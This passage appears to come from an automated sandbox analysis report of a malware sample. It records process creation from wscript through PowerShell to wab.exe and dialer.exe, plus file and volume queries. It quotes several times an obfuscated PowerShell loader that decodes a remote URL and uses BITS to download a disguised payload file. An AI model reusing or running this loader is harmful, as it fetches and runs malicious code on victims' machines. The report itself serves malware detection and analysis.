Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Krse ($Udrensnri){For($Holdk=7; $Holdk -lt $Udrensnri.Length-1; $Holdk+=8){ $bekraefte+=$Udrensnri.Substring($Holdk, 1);}$bekraefte;}$bekraefte01=Krse 'Unrelini SouffleRovsedexHinchmi ';$bekraefte02=Krse 'AllitteTLgninger NonminaSnorkelnDrawplasHydrostfCodificeAchiertrBindheirkarnevai QuadrinRegressgProphet ';function Fundmong ($Avoutry){. ($bekraefte01) ($Avoutry);}$Jaspedam82=Krse 'CelebrehStenklvtDybdemat Expetipsemidels Blackl: Bemest/Bromidi/CandollwPlateaswrochetswDrtrinn.RefereraUtaethes SteurotFantasteDalliannLeafedstTilbageeHyperacrPremillp OddfelrIronikeiFunderes ForlageLocomots nonaff.SubtotacVarmefroCreaminmPlatypt.FormatkplibidinkSandsyn/RebozotmKimsendsBygning/BaggaarS OvertepKistegleUninundjMeedful.Ideologt TenuirtTuckykof Overen ';$bekraefte00=Krse 'approks$ SternngGynecollRoofwisoTaipoclbbetonrkaLogopedlFloddel:BacilleCTransforKlemskruYnkvrdisPartakiaInitiald KodifioDonskywvBloodthaTyggende Stykvr8nonvend Melone= Forste DecolonS AlphabtMinikenaForhaanrGeneralt Plasmo-IndfrelBAvlsbruiDvrgeflt AbdelrsNerviikTForslver Pederaa SubternHeadless Hilsepf HundreeRsknernr Unphil Rokkene-MystifiS OverfloFrembriuEconomir SignalcLuftrrbeVarmeis Crotche$AmtskomJSiddebaaAssembls PlastipParvifoe Tiltogd BoundlaBestialmPemmica8Angribe2Toiletp encomi-ArveretDstuppeneBibabudsMotionetLandfogiResentsnaktiekaaSupersatUnderstipathletoSjllandnforlyst Praktis$SammenbCBeechamrIrongoluFunestasSchlossaPestersdJgerstuo NonprovNonpessaRationae Cofoun2Spaecra ';Fundmong (Krse 'Omfangs$TumultegGaardsplPastieroUrbiaspbindpakkaSymfonilafdrags:AcolhuaCAfspndirCarlineuModellesFlgenesaFalanksd BommenoKaffetivMultiplaBekmpelePerpetu2Promisi=Imitato$ProduktePurgatinIncomprvSulfini: KartotaNonintepPersillp BeaverdVildepraFolacintFugersoaMispris ') ;Fundmong (Krse 'AfbenytIFalderamSlingrepturbehsoCryptohrPanicketEtagese-GeograpMUnarbitoUafvised Erstatu Biscayl Pimpere Parado OutmarrBUntrammiAfgudentresultasFlerbruTStansemrSvineavachurnfunOptjercsVedtagefRedecideKikrterrAfhvlin ') ;$Crusadovae2=$Crusadovae2+'\Notorhiza.Sal' ;Fundmong (Krse ' slambr$DebusedgGlobatel Telpheo AnskuebFlagstraEbbcritlKokseth:rredtekC limfarrMslsveru RutsjesAabjrnsaRestipud Prefoco CandidvAgrarkoaDespitoeDeceler7Mashall=imperfo(GuslarpTLovforbeGilenorsChloroptUnbelie-PleurahPPreasceaStillelt ForklahMerceri Corrive$AugustoCUdhamrircosmeteuSelskabsGallakla PillerdOpsadleoRosethavAntbirdaSvingnietrawled2Hippocr)Fairlea ') ;while (-not $Crusadovae7) {Fundmong (Krse 'DiscernISpreneufLegende Sulphoh(Waggonl$eksplosCPyramidrInverseu LepilespaltereaTidsskrdDriftskoWhiterovSpirantaMeasurieUnlovea8Dkliste.TumlersJ securioKryptonbCifferlSSwollentSkifertaSandormtRedeploeHvorind Smykken-ChambereSkebladqfyrsted Biestin$Kahytsjb Atommie AktivikStilkunrKatapulaNapoleoeLykkebrfProtoprtSpearmieDriftsr0Udsprjt2tankefu) Nbbene Jamaic{BeskrivS Despott MamushaIrradiarHalvbrotEthenoi-BrJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                    Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong (krse 'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-br
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong (krse 'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-br
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong (krse 'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-brJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function krse ($udrensnri){for($holdk=7; $holdk -lt $udrensnri.length-1; $holdk+=8){ $bekraefte+=$udrensnri.substring($holdk, 1);}$bekraefte;}$bekraefte01=krse 'unrelini soufflerovsedexhinchmi ';$bekraefte02=krse 'allittetlgninger nonminasnorkelndrawplashydrostfcodificeachiertrbindheirkarnevai quadrinregressgprophet ';function fundmong ($avoutry){. ($bekraefte01) ($avoutry);}$jaspedam82=krse 'celebrehstenklvtdybdemat expetipsemidels blackl: bemest/bromidi/candollwplateaswrochetswdrtrinn.refererautaethes steurotfantastedalliannleafedsttilbageehyperacrpremillp oddfelrironikeifunderes forlagelocomots nonaff.subtotacvarmefrocreaminmplatypt.formatkplibidinksandsyn/rebozotmkimsendsbygning/baggaars overtepkistegleuninundjmeedful.ideologt tenuirttuckykof overen ';$bekraefte00=krse 'approks$ sternnggynecollroofwisotaipoclbbetonrkalogopedlfloddel:bacillectransforklemskruynkvrdispartakiainitiald kodifiodonskywvbloodthatyggende stykvr8nonvend melone= forste decolons alphabtminikenaforhaanrgeneralt plasmo-indfrelbavlsbruidvrgeflt abdelrsnerviiktforslver pederaa subternheadless hilsepf hundreersknernr unphil rokkene-mystifis overflofrembriueconomir signalcluftrrbevarmeis crotche$amtskomjsiddebaaassembls plastipparvifoe tiltogd boundlabestialmpemmica8angribe2toiletp encomi-arveretdstuppenebibabudsmotionetlandfogiresentsnaktiekaasupersatunderstipathletosjllandnforlyst praktis$sammenbcbeechamrirongolufunestasschlossapestersdjgerstuo nonprovnonpessarationae cofoun2spaecra ';fundmong (krse 'omfangs$tumulteggaardsplpastierourbiaspbindpakkasymfonilafdrags:acolhuacafspndircarlineumodellesflgenesafalanksd bommenokaffetivmultiplabekmpeleperpetu2promisi=imitato$produktepurgatinincomprvsulfini: kartotanoninteppersillp beaverdvildeprafolacintfugersoamispris ') ;fundmong (krse 'afbenytifalderamslingrepturbehsocryptohrpanicketetagese-geograpmunarbitouafvised erstatu biscayl pimpere parado outmarrbuntrammiafgudentresultasflerbrutstansemrsvineavachurnfunoptjercsvedtagefredecidekikrterrafhvlin ') ;$crusadovae2=$crusadovae2+'\notorhiza.sal' ;fundmong (krse ' slambr$debusedgglobatel telpheo anskuebflagstraebbcritlkokseth:rredtekc limfarrmslsveru rutsjesaabjrnsarestipud prefoco candidvagrarkoadespitoedeceler7mashall=imperfo(guslarptlovforbegilenorschloroptunbelie-pleurahppreasceastillelt forklahmerceri corrive$augustocudhamrircosmeteuselskabsgallakla pillerdopsadleorosethavantbirdasvingnietrawled2hippocr)fairlea ') ;while (-not $crusadovae7) {fundmong (krse 'discernispreneuflegende sulphoh(waggonl$eksploscpyramidrinverseu lepilespaltereatidsskrddriftskowhiterovspirantameasurieunlovea8dkliste.tumlersj securiokryptonbcifferlsswollentskifertasandormtredeploehvorind smykken-chambereskebladqfyrsted biestin$kahytsjb atommie aktivikstilkunrkatapulanapoleoelykkebrfprotoprtspearmiedriftsr0udsprjt2tankefu) nbbene jamaic{beskrivs despott mamushairradiarhalvbrotethenoi-brJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
